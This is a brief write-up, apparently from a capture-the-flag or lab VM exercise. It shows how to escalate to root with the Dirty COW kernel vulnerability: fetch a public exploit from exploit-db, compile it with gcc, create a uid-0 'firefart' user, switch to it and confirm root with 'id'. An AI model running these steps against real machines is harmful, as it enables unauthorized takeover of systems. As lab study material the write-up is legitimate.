# Dirty Cow - Kernel vulnerability

Connect inside VM via ssh using `laurie` credentials from writeup2.md.  
Copy source file on machine from `https://www.exploit-db.com/exploits/40839`.  
Compile it with `gcc -pthread dirty.c -o dirty -lcrypt`.  
Command: `./dirty <new password>`  
Change user with `su firefart` and password `<new password>`  
Now we have root group privileges, so we can do whatever we want.  
Command: `id`  
> `uid=0(firefart) gid=0(root) groups=0(root)`